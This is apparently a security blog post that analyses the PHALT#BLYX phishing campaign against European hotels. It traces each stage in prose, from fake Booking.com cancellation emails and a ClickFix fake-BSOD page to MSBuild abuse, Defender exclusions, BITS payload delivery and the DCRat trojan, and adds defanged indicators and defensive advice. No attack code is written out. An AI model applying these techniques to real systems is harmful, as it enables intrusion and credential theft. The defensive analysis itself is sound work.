Posted in

PHALT#BLYX: Fake BSOD Phishing That Puts Hotels at Risk

by Rakesh0

Cybercriminals are no longer relying on noisy exploits or obvious malware attachments. Instead, they are weaponizing social engineering, urgency, and users’ instinct to “fix” technical problems themselves.

A newly identified phishing campaign dubbed PHALT#BLYX illustrates this shift perfectly. The campaign targets hotels and hospitality businesses across Europe, particularly during the busy holiday season, when staff are under pressure and booking‑related emails are common.

The attack combines:

  • Fake Booking.com cancellation notices
  • An advanced ClickFix social‑engineering technique
  • Abuse of legitimate Windows tools (“Living off the Land”)
  • And deployment of the DCRat remote access trojan

The result is a multi‑stage, highly evasive intrusion chain that often bypasses traditional email security and endpoint defenses.

What Is PHALT#BLYX?

PHALT#BLYX is not a simple phishing campaign. Instead of convincing victims to open a malicious attachment, it tricks them into manually executing malware themselves, believing they are resolving a system error.

At the center of the campaign is a fake Windows Blue Screen of Death (BSOD) displayed inside a web browser. This visual deception creates panic and urgency, pushing users to follow on‑screen “repair” instructions without questioning them.

The attackers’ objectives include:

  • Gaining persistent remote access to hotel systems
  • Stealing credentials and sensitive booking information
  • Maintaining long‑term access via DCRat for further abuse

Attack Chain Overview: A Multi‑Stage “Living off the Land” Operation

Stage 1: Phishing Emails Masquerading as Booking.com Alerts

The attack begins with phishing emails impersonating Booking.com reservation cancellations.

Common characteristics include:

  • References to unexpected or inflated charges in euros
  • Urgent language suggesting financial impact
  • A prominent “See details” button

These emails are particularly effective against hospitality staff who deal with booking platforms daily.

Stage 2: Redirect to a Convincing Booking.com Clone

Clicking the button redirects the victim through:

oncameraworkout[.]com/ksbo

to the phishing domain:

low-house[.]com

The website is a near‑perfect visual clone of Booking.com, making it difficult for non‑technical users to detect the fraud.

After a short delay, the page displays a “loading” error and presents a Refresh button.

Stage 3: ClickFix Technique and Fake BSOD

When the victim clicks Refresh, the website triggers the core deception:

  • A fake Windows Blue Screen of Death appears in the browser
  • The user is instructed to “fix” the problem by:
    1. Pressing Windows + R
    2. Pasting a command already copied to the clipboard
    3. Executing it via the Run dialog

This technique—known as ClickFix—forces the victim to execute a malicious PowerShell command manually, sidestepping many automated security controls.

Stage 4: PowerShell and MSBuild Abuse

The hidden PowerShell command fetches an MSBuild project file named:

v.proj

from:

2fa-bns[.]com

The file is executed using MSBuild.exe, a legitimate Microsoft development tool.

This is a classic Living‑off‑the‑Land (LotL) tactic:

  • No custom loader
  • No signed malware binary
  • Execution blends into normal system activity

For many antivirus and EDR products, this behavior appears low‑risk.

Disabling Defenses and Establishing Persistence

Once executed, the malicious project file performs several actions:

Windows Defender Manipulation

It adds exclusions for:

  • .exe
  • .ps1
  • .proj

The malware then attempts privilege escalation.

If Administrator Rights Are Obtained

  • Windows Defender real‑time protection is disabled
  • Additional defensive layers are weakened
  • The environment becomes safe for payload delivery

Payload Delivery via BITS

The malware downloads:

staxs.exe

using the Background Intelligent Transfer Service (BITS)—another trusted Windows component commonly abused by attackers.

Unusual Persistence Mechanism

Instead of traditional registry run keys or scheduled tasks, the malware creates:

  • A URL shortcut (.url file) in the Startup folder

This ensures execution on every reboot while remaining relatively stealthy.

Final Stage: DCRat Remote Access Trojan

The final payload is DCRat, a powerful remote access trojan of Russian origin.

Key Technical Capabilities

  • AES‑256 encryption
  • Configuration protection using PBKDF2
  • Code injection into aspnet_compiler.exe for stealth
  • Communication over TCP port 3535

Observed Command‑and‑Control Servers

  • asj77[.]com
  • asj88[.]com
  • asj99[.]com

What Attackers Can Do with DCRat

Once connected, DCRat enables operators to:

  • Perform keylogging
  • Access a remote shell
  • Capture screenshots
  • Upload or download files
  • Deploy additional payloads (including coin miners)
  • Maintain long‑term surveillance

This transforms infected systems into fully controllable remote assets.

Attribution and Campaign Evolution

Researchers at Securonix identified:

  • Cyrillic debug strings within the malware
  • Structural similarities to AsyncRAT
  • Indicators suggesting Russian‑speaking developers

Notably, this campaign represents an evolution:

  • Earlier variants relied on HTA‑based execution
  • PHALT#BLYX now uses MSBuild‑driven execution, increasing stealth and persistence

Why This Campaign Is Especially Dangerous

PHALT#BLYX highlights several modern threat trends:

  • ✅ Users execute malware themselves
  • ✅ Only legitimate Windows tools are used
  • ✅ Minimal forensic artifacts
  • ✅ High success rate through psychological pressure

Defensive technologies alone are insufficient if users can be coerced into bypassing them.

Recommended Defensive Measures

Technical Monitoring and Detection

  • Enable detailed PowerShell logging
  • Monitor MSBuild.exe execution outside development environments
  • Alert on suspicious .proj files
  • Inspect Startup folders for unexpected .url shortcuts

User Awareness and Training

  • Educate staff about ClickFix techniques
  • Warn against instructions to “repair” systems via web pages
  • Establish clear escalation procedures for suspicious emails

Zero Trust and Hardening

  • Enforce least‑privilege access
  • Restrict PowerShell and MSBuild usage where possible
  • Apply application allow‑listing
  • Separate booking systems from core infrastructure

Conclusion: Social Engineering Beats Exploits

PHALT#BLYX demonstrates a key reality of modern cyber threats:

The most effective attacks don’t break systems—they manipulate people.

By combining:

  • Convincing visuals
  • Trusted tools
  • And human psychology

Attackers can bypass even well‑configured defenses.

For hospitality organizations—where speed, customer service, and seasonal pressure are constant—the risk is particularly high. Effective defense requires technology, processes, and people to work together.

Subscribe

Leave a Reply

Your email address will not be published. Required fields are marked *